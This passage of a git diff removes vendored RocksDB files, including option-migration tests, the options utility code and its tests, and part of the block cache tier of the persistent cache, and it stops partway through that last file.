-      dbfull()->CompactRange(cro, nullptr, nullptr);
-    }
-  }
-  dbfull()->TEST_WaitForFlushMemTable();
-  dbfull()->TEST_WaitForCompact();
-
-  // Will make sure exactly those keys are in the DB after migration.
-  std::set<std::string> keys;
-  {
-    std::unique_ptr<Iterator> it(db_->NewIterator(ReadOptions()));
-    it->SeekToFirst();
-    for (; it->Valid(); it->Next()) {
-      keys.insert(it->key().ToString());
-    }
-  }
-
-  Close();
-
-  Options new_options = old_options;
-  new_options.compaction_style =
-      static_cast<CompactionStyle>(compaction_style1_);
-  if (new_options.compaction_style == CompactionStyle::kCompactionStyleLevel) {
-    new_options.level_compaction_dynamic_level_bytes = is_dynamic1_;
-  }
-  new_options.target_file_size_base = 256 * 1024;
-  new_options.num_levels = level1_;
-  new_options.max_bytes_for_level_base = 150 * 1024;
-  new_options.max_bytes_for_level_multiplier = 4;
-  ASSERT_OK(OptionChangeMigration(dbname_, old_options, new_options));
-  Reopen(new_options);
-  // Wait for compaction to finish and make sure it can reopen
-  dbfull()->TEST_WaitForFlushMemTable();
-  dbfull()->TEST_WaitForCompact();
-  Reopen(new_options);
-
-  {
-    std::unique_ptr<Iterator> it(db_->NewIterator(ReadOptions()));
-    it->SeekToFirst();
-    for (std::string key : keys) {
-      ASSERT_TRUE(it->Valid());
-      ASSERT_EQ(key, it->key().ToString());
-      it->Next();
-    }
-    ASSERT_TRUE(!it->Valid());
-  }
-}
-
-INSTANTIATE_TEST_CASE_P(
-    DBOptionChangeMigrationTests, DBOptionChangeMigrationTests,
-    ::testing::Values(std::make_tuple(3, 0, false, 4, 0, false),
-                      std::make_tuple(3, 0, true, 4, 0, true),
-                      std::make_tuple(3, 0, true, 4, 0, false),
-                      std::make_tuple(3, 0, false, 4, 0, true),
-                      std::make_tuple(3, 1, false, 4, 1, false),
-                      std::make_tuple(1, 1, false, 4, 1, false),
-                      std::make_tuple(3, 0, false, 4, 1, false),
-                      std::make_tuple(3, 0, false, 1, 1, false),
-                      std::make_tuple(3, 0, true, 4, 1, false),
-                      std::make_tuple(3, 0, true, 1, 1, false),
-                      std::make_tuple(1, 1, false, 4, 0, false),
-                      std::make_tuple(4, 0, false, 1, 2, false),
-                      std::make_tuple(3, 0, true, 2, 2, false),
-                      std::make_tuple(3, 1, false, 3, 2, false),
-                      std::make_tuple(1, 1, false, 4, 2, false)));
-
-class DBOptionChangeMigrationTest : public DBTestBase {
- public:
-  DBOptionChangeMigrationTest()
-      : DBTestBase("/db_option_change_migration_test2") {}
-};
-
-TEST_F(DBOptionChangeMigrationTest, CompactedSrcToUniversal) {
-  Options old_options = CurrentOptions();
-  old_options.compaction_style = CompactionStyle::kCompactionStyleLevel;
-  old_options.max_compaction_bytes = 200 * 1024;
-  old_options.level_compaction_dynamic_level_bytes = false;
-  old_options.level0_file_num_compaction_trigger = 3;
-  old_options.write_buffer_size = 64 * 1024;
-  old_options.target_file_size_base = 128 * 1024;
-  // Make level target of L1, L2 to be 200KB and 600KB
-  old_options.num_levels = 4;
-  old_options.max_bytes_for_level_multiplier = 3;
-  old_options.max_bytes_for_level_base = 200 * 1024;
-
-  Reopen(old_options);
-  Random rnd(301);
-  for (int num = 0; num < 20; num++) {
-    for (int i = 0; i < 50; i++) {
-      ASSERT_OK(Put(Key(num * 100 + i), RandomString(&rnd, 900)));
-    }
-  }
-  Flush();
-  CompactRangeOptions cro;
-  cro.bottommost_level_compaction = BottommostLevelCompaction::kForce;
-  dbfull()->CompactRange(cro, nullptr, nullptr);
-
-  // Will make sure exactly those keys are in the DB after migration.
-  std::set<std::string> keys;
-  {
-    std::unique_ptr<Iterator> it(db_->NewIterator(ReadOptions()));
-    it->SeekToFirst();
-    for (; it->Valid(); it->Next()) {
-      keys.insert(it->key().ToString());
-    }
-  }
-
-  Close();
-
-  Options new_options = old_options;
-  new_options.compaction_style = CompactionStyle::kCompactionStyleUniversal;
-  new_options.target_file_size_base = 256 * 1024;
-  new_options.num_levels = 1;
-  new_options.max_bytes_for_level_base = 150 * 1024;
-  new_options.max_bytes_for_level_multiplier = 4;
-  ASSERT_OK(OptionChangeMigration(dbname_, old_options, new_options));
-  Reopen(new_options);
-  // Wait for compaction to finish and make sure it can reopen
-  dbfull()->TEST_WaitForFlushMemTable();
-  dbfull()->TEST_WaitForCompact();
-  Reopen(new_options);
-
-  {
-    std::unique_ptr<Iterator> it(db_->NewIterator(ReadOptions()));
-    it->SeekToFirst();
-    for (std::string key : keys) {
-      ASSERT_TRUE(it->Valid());
-      ASSERT_EQ(key, it->key().ToString());
-      it->Next();
-    }
-    ASSERT_TRUE(!it->Valid());
-  }
-}
-
-#endif  // ROCKSDB_LITE
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  rocksdb::port::InstallStackTraceHandler();
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/utilities/options/options_util.cc b/thirdparty/rocksdb/utilities/options/options_util.cc
deleted file mode 100644
index 2173492..0000000
--- a/thirdparty/rocksdb/utilities/options/options_util.cc
+++ /dev/null
@@ -1,102 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#include "rocksdb/utilities/options_util.h"
-
-#include "options/options_parser.h"
-#include "rocksdb/options.h"
-#include "util/filename.h"
-
-namespace rocksdb {
-Status LoadOptionsFromFile(const std::string& file_name, Env* env,
-                           DBOptions* db_options,
-                           std::vector<ColumnFamilyDescriptor>* cf_descs,
-                           bool ignore_unknown_options) {
-  RocksDBOptionsParser parser;
-  Status s = parser.Parse(file_name, env, ignore_unknown_options);
-  if (!s.ok()) {
-    return s;
-  }
-
-  *db_options = *parser.db_opt();
-
-  const std::vector<std::string>& cf_names = *parser.cf_names();
-  const std::vector<ColumnFamilyOptions>& cf_opts = *parser.cf_opts();
-  cf_descs->clear();
-  for (size_t i = 0; i < cf_opts.size(); ++i) {
-    cf_descs->push_back({cf_names[i], cf_opts[i]});
-  }
-  return Status::OK();
-}
-
-Status GetLatestOptionsFileName(const std::string& dbpath,
-                                Env* env, std::string* options_file_name) {
-  Status s;
-  std::string latest_file_name;
-  uint64_t latest_time_stamp = 0;
-  std::vector<std::string> file_names;
-  s = env->GetChildren(dbpath, &file_names);
-  if (!s.ok()) {
-    return s;
-  }
-  for (auto& file_name : file_names) {
-    uint64_t time_stamp;
-    FileType type;
-    if (ParseFileName(file_name, &time_stamp, &type) && type == kOptionsFile) {
-      if (time_stamp > latest_time_stamp) {
-        latest_time_stamp = time_stamp;
-        latest_file_name = file_name;
-      }
-    }
-  }
-  if (latest_file_name.size() == 0) {
-    return Status::NotFound("No options files found in the DB directory.");
-  }
-  *options_file_name = latest_file_name;
-  return Status::OK();
-}
-
-Status LoadLatestOptions(const std::string& dbpath, Env* env,
-                         DBOptions* db_options,
-                         std::vector<ColumnFamilyDescriptor>* cf_descs,
-                         bool ignore_unknown_options) {
-  std::string options_file_name;
-  Status s = GetLatestOptionsFileName(dbpath, env, &options_file_name);
-  if (!s.ok()) {
-    return s;
-  }
-
-  return LoadOptionsFromFile(dbpath + "/" + options_file_name, env, db_options,
-                             cf_descs, ignore_unknown_options);
-}
-
-Status CheckOptionsCompatibility(
-    const std::string& dbpath, Env* env, const DBOptions& db_options,
-    const std::vector<ColumnFamilyDescriptor>& cf_descs,
-    bool ignore_unknown_options) {
-  std::string options_file_name;
-  Status s = GetLatestOptionsFileName(dbpath, env, &options_file_name);
-  if (!s.ok()) {
-    return s;
-  }
-
-  std::vector<std::string> cf_names;
-  std::vector<ColumnFamilyOptions> cf_opts;
-  for (const auto& cf_desc : cf_descs) {
-    cf_names.push_back(cf_desc.name);
-    cf_opts.push_back(cf_desc.options);
-  }
-
-  const OptionsSanityCheckLevel kDefaultLevel = kSanityLevelLooselyCompatible;
-
-  return RocksDBOptionsParser::VerifyRocksDBOptionsFromFile(
-      db_options, cf_names, cf_opts, dbpath + "/" + options_file_name, env,
-      kDefaultLevel, ignore_unknown_options);
-}
-
-}  // namespace rocksdb
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/options/options_util_test.cc b/thirdparty/rocksdb/utilities/options/options_util_test.cc
deleted file mode 100644
index 2ca8d47..0000000
--- a/thirdparty/rocksdb/utilities/options/options_util_test.cc
+++ /dev/null
@@ -1,317 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <inttypes.h>
-
-#include <cctype>
-#include <unordered_map>
-
-#include "options/options_parser.h"
-#include "rocksdb/db.h"
-#include "rocksdb/table.h"
-#include "rocksdb/utilities/options_util.h"
-#include "util/random.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-
-#ifndef GFLAGS
-bool FLAGS_enable_print = false;
-#else
-#include <gflags/gflags.h>
-using GFLAGS::ParseCommandLineFlags;
-DEFINE_bool(enable_print, false, "Print options generated to console.");
-#endif  // GFLAGS
-
-namespace rocksdb {
-class OptionsUtilTest : public testing::Test {
- public:
-  OptionsUtilTest() : rnd_(0xFB) {
-    env_.reset(new test::StringEnv(Env::Default()));
-    dbname_ = test::TmpDir() + "/options_util_test";
-  }
-
- protected:
-  std::unique_ptr<test::StringEnv> env_;
-  std::string dbname_;
-  Random rnd_;
-};
-
-bool IsBlockBasedTableFactory(TableFactory* tf) {
-  return tf->Name() == BlockBasedTableFactory().Name();
-}
-
-TEST_F(OptionsUtilTest, SaveAndLoad) {
-  const size_t kCFCount = 5;
-
-  DBOptions db_opt;
-  std::vector<std::string> cf_names;
-  std::vector<ColumnFamilyOptions> cf_opts;
-  test::RandomInitDBOptions(&db_opt, &rnd_);
-  for (size_t i = 0; i < kCFCount; ++i) {
-    cf_names.push_back(i == 0 ? kDefaultColumnFamilyName
-                              : test::RandomName(&rnd_, 10));
-    cf_opts.emplace_back();
-    test::RandomInitCFOptions(&cf_opts.back(), &rnd_);
-  }
-
-  const std::string kFileName = "OPTIONS-123456";
-  PersistRocksDBOptions(db_opt, cf_names, cf_opts, kFileName, env_.get());
-
-  DBOptions loaded_db_opt;
-  std::vector<ColumnFamilyDescriptor> loaded_cf_descs;
-  ASSERT_OK(LoadOptionsFromFile(kFileName, env_.get(), &loaded_db_opt,
-                                &loaded_cf_descs));
-
-  ASSERT_OK(RocksDBOptionsParser::VerifyDBOptions(db_opt, loaded_db_opt));
-  test::RandomInitDBOptions(&db_opt, &rnd_);
-  ASSERT_NOK(RocksDBOptionsParser::VerifyDBOptions(db_opt, loaded_db_opt));
-
-  for (size_t i = 0; i < kCFCount; ++i) {
-    ASSERT_EQ(cf_names[i], loaded_cf_descs[i].name);
-    ASSERT_OK(RocksDBOptionsParser::VerifyCFOptions(
-        cf_opts[i], loaded_cf_descs[i].options));
-    if (IsBlockBasedTableFactory(cf_opts[i].table_factory.get())) {
-      ASSERT_OK(RocksDBOptionsParser::VerifyTableFactory(
-          cf_opts[i].table_factory.get(),
-          loaded_cf_descs[i].options.table_factory.get()));
-    }
-    test::RandomInitCFOptions(&cf_opts[i], &rnd_);
-    ASSERT_NOK(RocksDBOptionsParser::VerifyCFOptions(
-        cf_opts[i], loaded_cf_descs[i].options));
-  }
-
-  for (size_t i = 0; i < kCFCount; ++i) {
-    if (cf_opts[i].compaction_filter) {
-      delete cf_opts[i].compaction_filter;
-    }
-  }
-}
-
-namespace {
-class DummyTableFactory : public TableFactory {
- public:
-  DummyTableFactory() {}
-  virtual ~DummyTableFactory() {}
-
-  virtual const char* Name() const override { return "DummyTableFactory"; }
-
-  virtual Status NewTableReader(
-      const TableReaderOptions& table_reader_options,
-      unique_ptr<RandomAccessFileReader>&& file, uint64_t file_size,
-      unique_ptr<TableReader>* table_reader,
-      bool prefetch_index_and_filter_in_cache) const override {
-    return Status::NotSupported();
-  }
-
-  virtual TableBuilder* NewTableBuilder(
-      const TableBuilderOptions& table_builder_options,
-      uint32_t column_family_id, WritableFileWriter* file) const override {
-    return nullptr;
-  }
-
-  virtual Status SanitizeOptions(
-      const DBOptions& db_opts,
-      const ColumnFamilyOptions& cf_opts) const override {
-    return Status::NotSupported();
-  }
-
-  virtual std::string GetPrintableTableOptions() const override { return ""; }
-
-  Status GetOptionString(std::string* opt_string,
-                         const std::string& delimiter) const override {
-    return Status::OK();
-  }
-};
-
-class DummyMergeOperator : public MergeOperator {
- public:
-  DummyMergeOperator() {}
-  virtual ~DummyMergeOperator() {}
-
-  virtual bool FullMergeV2(const MergeOperationInput& merge_in,
-                           MergeOperationOutput* merge_out) const override {
-    return false;
-  }
-
-  virtual bool PartialMergeMulti(const Slice& key,
-                                 const std::deque<Slice>& operand_list,
-                                 std::string* new_value,
-                                 Logger* logger) const override {
-    return false;
-  }
-
-  virtual const char* Name() const override { return "DummyMergeOperator"; }
-};
-
-class DummySliceTransform : public SliceTransform {
- public:
-  DummySliceTransform() {}
-  virtual ~DummySliceTransform() {}
-
-  // Return the name of this transformation.
-  virtual const char* Name() const { return "DummySliceTransform"; }
-
-  // transform a src in domain to a dst in the range
-  virtual Slice Transform(const Slice& src) const { return src; }
-
-  // determine whether this is a valid src upon the function applies
-  virtual bool InDomain(const Slice& src) const { return false; }
-
-  // determine whether dst=Transform(src) for some src
-  virtual bool InRange(const Slice& dst) const { return false; }
-};
-
-}  // namespace
-
-TEST_F(OptionsUtilTest, SanityCheck) {
-  DBOptions db_opt;
-  std::vector<ColumnFamilyDescriptor> cf_descs;
-  const size_t kCFCount = 5;
-  for (size_t i = 0; i < kCFCount; ++i) {
-    cf_descs.emplace_back();
-    cf_descs.back().name =
-        (i == 0) ? kDefaultColumnFamilyName : test::RandomName(&rnd_, 10);
-
-    cf_descs.back().options.table_factory.reset(NewBlockBasedTableFactory());
-    // Assign non-null values to prefix_extractors except the first cf.
-    cf_descs.back().options.prefix_extractor.reset(
-        i != 0 ? test::RandomSliceTransform(&rnd_) : nullptr);
-    cf_descs.back().options.merge_operator.reset(
-        test::RandomMergeOperator(&rnd_));
-  }
-
-  db_opt.create_missing_column_families = true;
-  db_opt.create_if_missing = true;
-
-  DestroyDB(dbname_, Options(db_opt, cf_descs[0].options));
-  DB* db;
-  std::vector<ColumnFamilyHandle*> handles;
-  // open and persist the options
-  ASSERT_OK(DB::Open(db_opt, dbname_, cf_descs, &handles, &db));
-
-  // close the db
-  for (auto* handle : handles) {
-    delete handle;
-  }
-  delete db;
-
-  // perform sanity check
-  ASSERT_OK(
-      CheckOptionsCompatibility(dbname_, Env::Default(), db_opt, cf_descs));
-
-  ASSERT_GE(kCFCount, 5);
-  // merge operator
-  {
-    std::shared_ptr<MergeOperator> merge_op =
-        cf_descs[0].options.merge_operator;
-
-    ASSERT_NE(merge_op.get(), nullptr);
-    cf_descs[0].options.merge_operator.reset();
-    ASSERT_NOK(
-        CheckOptionsCompatibility(dbname_, Env::Default(), db_opt, cf_descs));
-
-    cf_descs[0].options.merge_operator.reset(new DummyMergeOperator());
-    ASSERT_NOK(
-        CheckOptionsCompatibility(dbname_, Env::Default(), db_opt, cf_descs));
-
-    cf_descs[0].options.merge_operator = merge_op;
-    ASSERT_OK(
-        CheckOptionsCompatibility(dbname_, Env::Default(), db_opt, cf_descs));
-  }
-
-  // prefix extractor
-  {
-    std::shared_ptr<const SliceTransform> prefix_extractor =
-        cf_descs[1].options.prefix_extractor;
-
-    // It's okay to set prefix_extractor to nullptr.
-    ASSERT_NE(prefix_extractor, nullptr);
-    cf_descs[1].options.prefix_extractor.reset();
-    ASSERT_OK(
-        CheckOptionsCompatibility(dbname_, Env::Default(), db_opt, cf_descs));
-
-    cf_descs[1].options.prefix_extractor.reset(new DummySliceTransform());
-    ASSERT_OK(
-        CheckOptionsCompatibility(dbname_, Env::Default(), db_opt, cf_descs));
-
-    cf_descs[1].options.prefix_extractor = prefix_extractor;
-    ASSERT_OK(
-        CheckOptionsCompatibility(dbname_, Env::Default(), db_opt, cf_descs));
-  }
-
-  // prefix extractor nullptr case
-  {
-    std::shared_ptr<const SliceTransform> prefix_extractor =
-        cf_descs[0].options.prefix_extractor;
-
-    // It's okay to set prefix_extractor to nullptr.
-    ASSERT_EQ(prefix_extractor, nullptr);
-    cf_descs[0].options.prefix_extractor.reset();
-    ASSERT_OK(
-        CheckOptionsCompatibility(dbname_, Env::Default(), db_opt, cf_descs));
-
-    // It's okay to change prefix_extractor from nullptr to non-nullptr
-    cf_descs[0].options.prefix_extractor.reset(new DummySliceTransform());
-    ASSERT_OK(
-        CheckOptionsCompatibility(dbname_, Env::Default(), db_opt, cf_descs));
-
-    cf_descs[0].options.prefix_extractor = prefix_extractor;
-    ASSERT_OK(
-        CheckOptionsCompatibility(dbname_, Env::Default(), db_opt, cf_descs));
-  }
-
-  // comparator
-  {
-    test::SimpleSuffixReverseComparator comparator;
-
-    auto* prev_comparator = cf_descs[2].options.comparator;
-    cf_descs[2].options.comparator = &comparator;
-    ASSERT_NOK(
-        CheckOptionsCompatibility(dbname_, Env::Default(), db_opt, cf_descs));
-
-    cf_descs[2].options.comparator = prev_comparator;
-    ASSERT_OK(
-        CheckOptionsCompatibility(dbname_, Env::Default(), db_opt, cf_descs));
-  }
-
-  // table factory
-  {
-    std::shared_ptr<TableFactory> table_factory =
-        cf_descs[3].options.table_factory;
-
-    ASSERT_NE(table_factory, nullptr);
-    cf_descs[3].options.table_factory.reset(new DummyTableFactory());
-    ASSERT_NOK(
-        CheckOptionsCompatibility(dbname_, Env::Default(), db_opt, cf_descs));
-
-    cf_descs[3].options.table_factory = table_factory;
-    ASSERT_OK(
-        CheckOptionsCompatibility(dbname_, Env::Default(), db_opt, cf_descs));
-  }
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-#ifdef GFLAGS
-  ParseCommandLineFlags(&argc, &argv, true);
-#endif  // GFLAGS
-  return RUN_ALL_TESTS();
-}
-
-#else
-#include <cstdio>
-
-int main(int argc, char** argv) {
-  printf("Skipped in RocksDBLite as utilities are not supported.\n");
-  return 0;
-}
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/persistent_cache/block_cache_tier.cc b/thirdparty/rocksdb/utilities/persistent_cache/block_cache_tier.cc
deleted file mode 100644
index 714af2c..0000000
--- a/thirdparty/rocksdb/utilities/persistent_cache/block_cache_tier.cc
+++ /dev/null
@@ -1,425 +0,0 @@
-//  Copyright (c) 2013, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#ifndef ROCKSDB_LITE
-
-#include "utilities/persistent_cache/block_cache_tier.h"
-
-#include <regex>
-#include <utility>
-#include <vector>
-
-#include "port/port.h"
-#include "util/logging.h"
-#include "util/stop_watch.h"
-#include "util/sync_point.h"
-#include "utilities/persistent_cache/block_cache_tier_file.h"
-
-namespace rocksdb {
-
-//
-// BlockCacheImpl
-//
-Status BlockCacheTier::Open() {
-  Status status;
-
-  WriteLock _(&lock_);
-
-  assert(!size_);
-
-  // Check the validity of the options
-  status = opt_.ValidateSettings();
-  assert(status.ok());
-  if (!status.ok()) {
-    Error(opt_.log, "Invalid block cache options");
-    return status;
-  }
-
-  // Create base directory or cleanup existing directory
-  status = opt_.env->CreateDirIfMissing(opt_.path);
-  if (!status.ok()) {
-    Error(opt_.log, "Error creating directory %s. %s", opt_.path.c_str(),
-          status.ToString().c_str());
-    return status;
-  }
-
-  // Create base/<cache dir> directory
-  status = opt_.env->CreateDir(GetCachePath());
-  if (!status.ok()) {
-    // directory already exists, clean it up
-    status = CleanupCacheFolder(GetCachePath());
-    assert(status.ok());
-    if (!status.ok()) {
-      Error(opt_.log, "Error creating directory %s. %s", opt_.path.c_str(),
-            status.ToString().c_str());
-      return status;
-    }
-  }
-
-  // create a new file
-  assert(!cache_file_);
-  status = NewCacheFile();
-  if (!status.ok()) {
-    Error(opt_.log, "Error creating new file %s. %s", opt_.path.c_str(),
-          status.ToString().c_str());
-    return status;
-  }
-
-  assert(cache_file_);
-
-  if (opt_.pipeline_writes) {
-    assert(!insert_th_.joinable());
-    insert_th_ = port::Thread(&BlockCacheTier::InsertMain, this);
-  }
-
-  return Status::OK();
-}
-
-bool IsCacheFile(const std::string& file) {
-  // check if the file has .rc suffix
-  // Unfortunately regex support across compilers is not even, so we use simple
-  // string parsing
-  size_t pos = file.find(".");
-  if (pos == std::string::npos) {
-    return false;
-  }
-
-  std::string suffix = file.substr(pos);
-  return suffix == ".rc";
-}
-
-Status BlockCacheTier::CleanupCacheFolder(const std::string& folder) {
-  std::vector<std::string> files;
-  Status status = opt_.env->GetChildren(folder, &files);
-  if (!status.ok()) {
-    Error(opt_.log, "Error getting files for %s. %s", folder.c_str(),
-          status.ToString().c_str());
-    return status;
-  }
-
-  // cleanup files with the patter :digi:.rc
-  for (auto file : files) {
-    if (IsCacheFile(file)) {
-      // cache file
-      Info(opt_.log, "Removing file %s.", file.c_str());
-      status = opt_.env->DeleteFile(folder + "/" + file);
-      if (!status.ok()) {
-        Error(opt_.log, "Error deleting file %s. %s", file.c_str(),
-              status.ToString().c_str());
-        return status;
-      }
-    } else {
-      ROCKS_LOG_DEBUG(opt_.log, "Skipping file %s", file.c_str());
-    }
-  }
-  return Status::OK();
-}
-
-Status BlockCacheTier::Close() {
-  // stop the insert thread
-  if (opt_.pipeline_writes && insert_th_.joinable()) {
-    InsertOp op(/*quit=*/true);
-    insert_ops_.Push(std::move(op));
-    insert_th_.join();
-  }
-
-  // stop the writer before
-  writer_.Stop();
-
-  // clear all metadata
-  WriteLock _(&lock_);
-  metadata_.Clear();
-  return Status::OK();
-}
-
-template<class T>
-void Add(std::map<std::string, double>* stats, const std::string& key,
-         const T& t) {
-  stats->insert({key, static_cast<double>(t)});
-}
-
-PersistentCache::StatsType BlockCacheTier::Stats() {
-  std::map<std::string, double> stats;
-  Add(&stats, "persistentcache.blockcachetier.bytes_piplined",
-      stats_.bytes_pipelined_.Average());
-  Add(&stats, "persistentcache.blockcachetier.bytes_written",
-      stats_.bytes_written_.Average());
-  Add(&stats, "persistentcache.blockcachetier.bytes_read",
-      stats_.bytes_read_.Average());
-  Add(&stats, "persistentcache.blockcachetier.insert_dropped",
-      stats_.insert_dropped_);
-  Add(&stats, "persistentcache.blockcachetier.cache_hits",
-      stats_.cache_hits_);
-  Add(&stats, "persistentcache.blockcachetier.cache_misses",
-      stats_.cache_misses_);
-  Add(&stats, "persistentcache.blockcachetier.cache_errors",
-      stats_.cache_errors_);
-  Add(&stats, "persistentcache.blockcachetier.cache_hits_pct",
-      stats_.CacheHitPct());
-  Add(&stats, "persistentcache.blockcachetier.cache_misses_pct",
-      stats_.CacheMissPct());
-  Add(&stats, "persistentcache.blockcachetier.read_hit_latency",
-      stats_.read_hit_latency_.Average());
-  Add(&stats, "persistentcache.blockcachetier.read_miss_latency",
-      stats_.read_miss_latency_.Average());
-  Add(&stats, "persistenetcache.blockcachetier.write_latency",
-      stats_.write_latency_.Average());
-
-  auto out = PersistentCacheTier::Stats();
-  out.push_back(stats);
-  return out;
-}
-
-Status BlockCacheTier::Insert(const Slice& key, const char* data,
-                              const size_t size) {
-  // update stats
-  stats_.bytes_pipelined_.Add(size);
-
-  if (opt_.pipeline_writes) {
-    // off load the write to the write thread
-    insert_ops_.Push(
-        InsertOp(key.ToString(), std::move(std::string(data, size))));
-    return Status::OK();
-  }
-
-  assert(!opt_.pipeline_writes);
-  return InsertImpl(key, Slice(data, size));
-}
-
-void BlockCacheTier::InsertMain() {
-  while (true) {
-    InsertOp op(insert_ops_.Pop());
-
-    if (op.signal_) {
-      // that is a secret signal to exit
-      break;
-    }
-
-    size_t retry = 0;
-    Status s;
-    while ((s = InsertImpl(Slice(op.key_), Slice(op.data_))).IsTryAgain()) {
-      if (retry > kMaxRetry) {
-        break;
-      }
-
-      // this can happen when the buffers are full, we wait till some buffers
-      // are free. Why don't we wait inside the code. This is because we want
-      // to support both pipelined and non-pipelined mode
-      buffer_allocator_.WaitUntilUsable();
-      retry++;
-    }
-
-    if (!s.ok()) {
-      stats_.insert_dropped_++;
-    }
-  }
-}
-
-Status BlockCacheTier::InsertImpl(const Slice& key, const Slice& data) {
-  // pre-condition
-  assert(key.size());
-  assert(data.size());
-  assert(cache_file_);
-
-  StopWatchNano timer(opt_.env, /*auto_start=*/ true);
-
-  WriteLock _(&lock_);
-
-  LBA lba;
-  if (metadata_.Lookup(key, &lba)) {
-    // the key already exists, this is duplicate insert
-    return Status::OK();
-  }
-
-  while (!cache_file_->Append(key, data, &lba)) {
-    if (!cache_file_->Eof()) {
-      ROCKS_LOG_DEBUG(opt_.log, "Error inserting to cache file %d",
-                      cache_file_->cacheid());
-      stats_.write_latency_.Add(timer.ElapsedNanos() / 1000);
-      return Status::TryAgain();
-    }
-
-    assert(cache_file_->Eof());
-    Status status = NewCacheFile();
-    if (!status.ok()) {
-      return status;
-    }
-  }
-
-  // Insert into lookup index
-  BlockInfo* info = metadata_.Insert(key, lba);
-  assert(info);
-  if (!info) {
-    return Status::IOError("Unexpected error inserting to index");
-  }
-
-  // insert to cache file reverse mapping
-  cache_file_->Add(info);
-
-  // update stats
-  stats_.bytes_written_.Add(data.size());
-  stats_.write_latency_.Add(timer.ElapsedNanos() / 1000);
-  return Status::OK();
-}
-
-Status BlockCacheTier::Lookup(const Slice& key, unique_ptr<char[]>* val,
-                              size_t* size) {
-  StopWatchNano timer(opt_.env, /*auto_start=*/ true);
-
-  LBA lba;
-  bool status;
-  status = metadata_.Lookup(key, &lba);
-  if (!status) {
-    stats_.cache_misses_++;
-    stats_.read_miss_latency_.Add(timer.ElapsedNanos() / 1000);
-    return Status::NotFound("blockcache: key not found");
-  }
-
-  BlockCacheFile* const file = metadata_.Lookup(lba.cache_id_);
-  if (!file) {
-    // this can happen because the block index and cache file index are
-    // different, and the cache file might be removed between the two lookups
-    stats_.cache_misses_++;
-    stats_.read_miss_latency_.Add(timer.ElapsedNanos() / 1000);
-    return Status::NotFound("blockcache: cache file not found");
-  }
-
-  assert(file->refs_);
-
-  unique_ptr<char[]> scratch(new char[lba.size_]);
-  Slice blk_key;
-  Slice blk_val;
-
-  status = file->Read(lba, &blk_key, &blk_val, scratch.get());
-  --file->refs_;
-  if (!status) {
-    stats_.cache_misses_++;
-    stats_.cache_errors_++;
-    stats_.read_miss_latency_.Add(timer.ElapsedNanos() / 1000);
-    return Status::NotFound("blockcache: error reading data");
-  }
-
-  assert(blk_key == key);
-
-  val->reset(new char[blk_val.size()]);
-  memcpy(val->get(), blk_val.data(), blk_val.size());
-  *size = blk_val.size();
-
-  stats_.bytes_read_.Add(*size);
-  stats_.cache_hits_++;
-  stats_.read_hit_latency_.Add(timer.ElapsedNanos() / 1000);
-
-  return Status::OK();
-}
-
-bool BlockCacheTier::Erase(const Slice& key) {
-  WriteLock _(&lock_);
-  BlockInfo* info = metadata_.Remove(key);
-  assert(info);
-  delete info;
-  return true;
-}
-
-Status BlockCacheTier::NewCacheFile() {
-  lock_.AssertHeld();
-
-  TEST_SYNC_POINT_CALLBACK("BlockCacheTier::NewCacheFile:DeleteDir",
-                           (void*)(GetCachePath().c_str()));
-
-  std::unique_ptr<WriteableCacheFile> f(
-    new WriteableCacheFile(opt_.env, &buffer_allocator_, &writer_,
-                           GetCachePath(), writer_cache_id_,
-                           opt_.cache_file_size, opt_.log));
-
-  bool status = f->Create(opt_.enable_direct_writes, opt_.enable_direct_reads);
-  if (!status) {
-    return Status::IOError("Error creating file");
-  }
-
-  Info(opt_.log, "Created cache file %d", writer_cache_id_);
-
-  writer_cache_id_++;
-  cache_file_ = f.release();
-
-  // insert to cache files tree
-  status = metadata_.Insert(cache_file_);
-  assert(status);
-  if (!status) {
-    Error(opt_.log, "Error inserting to metadata");
-    return Status::IOError("Error inserting to metadata");
-  }
-
-  return Status::OK();
-}
-
-bool BlockCacheTier::Reserve(const size_t size) {
-  WriteLock _(&lock_);
-  assert(size_ <= opt_.cache_size);
-
-  if (size + size_ <= opt_.cache_size) {
-    // there is enough space to write
-    size_ += size;
-    return true;
-  }
-
-  assert(size + size_ >= opt_.cache_size);
-  // there is not enough space to fit the requested data
-  // we can clear some space by evicting cold data
-
-  const double retain_fac = (100 - kEvictPct) / static_cast<double>(100);
-  while (size + size_ > opt_.cache_size * retain_fac) {
-    unique_ptr<BlockCacheFile> f(metadata_.Evict());
-    if (!f) {
-      // nothing is evictable
-      return false;
-    }
-    assert(!f->refs_);
-    uint64_t file_size;
-    if (!f->Delete(&file_size).ok()) {
-      // unable to delete file
-      return false;
-    }
-
-    assert(file_size <= size_);
-    size_ -= file_size;
-  }
-
-  size_ += size;
-  assert(size_ <= opt_.cache_size * 0.9);
-  return true;
-}
-
-Status NewPersistentCache(Env* const env, const std::string& path,
-                          const uint64_t size,
-                          const std::shared_ptr<Logger>& log,
-                          const bool optimized_for_nvm,
-                          std::shared_ptr<PersistentCache>* cache) {
-  if (!cache) {
-    return Status::IOError("invalid argument cache");
-  }
-
-  auto opt = PersistentCacheConfig(env, path, size, log);
-  if (optimized_for_nvm) {
-    // the default settings are optimized for SSD
-    // NVM devices are better accessed with 4K direct IO and written with
-    // parallelism
-    opt.enable_direct_writes = true;
-    opt.writer_qdepth = 4;
